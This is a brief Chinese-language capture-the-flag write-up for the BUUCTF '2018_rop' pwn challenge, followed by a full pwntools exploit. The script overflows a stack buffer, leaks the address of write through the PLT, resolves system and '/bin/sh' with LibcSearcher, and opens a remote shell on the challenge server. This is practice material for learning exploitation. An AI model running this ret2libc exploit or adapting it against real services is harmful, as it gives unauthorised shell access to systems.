题目截图
例行检查
用IDA打开,在主函数中发现溢出点
没有找到后门函数,但是找到了write函数用来泄露libc版本
常规流程,先泄露libc版本,计算system函数和字符串bin/sh的地址再利用
exp
from pwn import*
from LibcSearcher import *
elf=ELF('/home/lhb/桌面/2018_rop')
p=remote('node4.buuoj.cn',26218)
main=0x80484C6
write_plt=elf.plt['write']
write_got=elf.got['write']
payload=b'a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
p.sendline(payload)
addr=u32(p.recv())
libc=LibcSearcher('write',addr)
libcbase = addr- libc.dump("write")
system_addr = libcbase + libc.dump("system")
bin_sh_addr = libcbase + libc.dump("str_bin_sh")
payload=b'a'*(0x88+4)+p32(system_addr)+p32(main)+p32(bin_sh_addr)
p.sendline(payload)
p.interactive()